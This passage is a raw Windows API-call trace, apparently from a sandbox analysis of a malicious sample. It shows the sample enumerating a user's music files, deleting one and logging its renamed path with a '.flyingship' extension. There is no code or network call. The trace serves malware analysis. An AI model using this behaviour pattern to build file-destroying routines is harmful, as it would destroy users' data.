ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0x11813fe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0x90af58 [0181.591] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\9zmv2.m4a")) returned 1 [0181.593] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0x11813fe0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 0 [0181.593] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0181.593] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.593] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.593] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.593] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.594] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.594] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.594] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.594] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.594] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.595] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0181.595] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.595] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0181.595] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1e2e, lpOverlapped=0x0) returned 1 [0181.596] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0181.596] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1e2e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.596] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0181.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0181.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5b) returned 0x9a5d78 [0181.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\n", cchWideChar=91, lpMultiByteStr=0x9a5d78, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 91 [0181.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0181.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0181.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0181.596] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5a, lpOverlapped=0x0) returned 1 [0181.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0181.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.597] CloseHandle (hObject=0x120) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0181.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0181.600] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0181.600] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.601] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0181.601] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.601] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0181.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.602] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0181.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0181.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0181.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0181.602] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0181.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0181.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0181.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.606] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0181.606] RtlAllocateHeap (HeapHandle=0x8a0000, 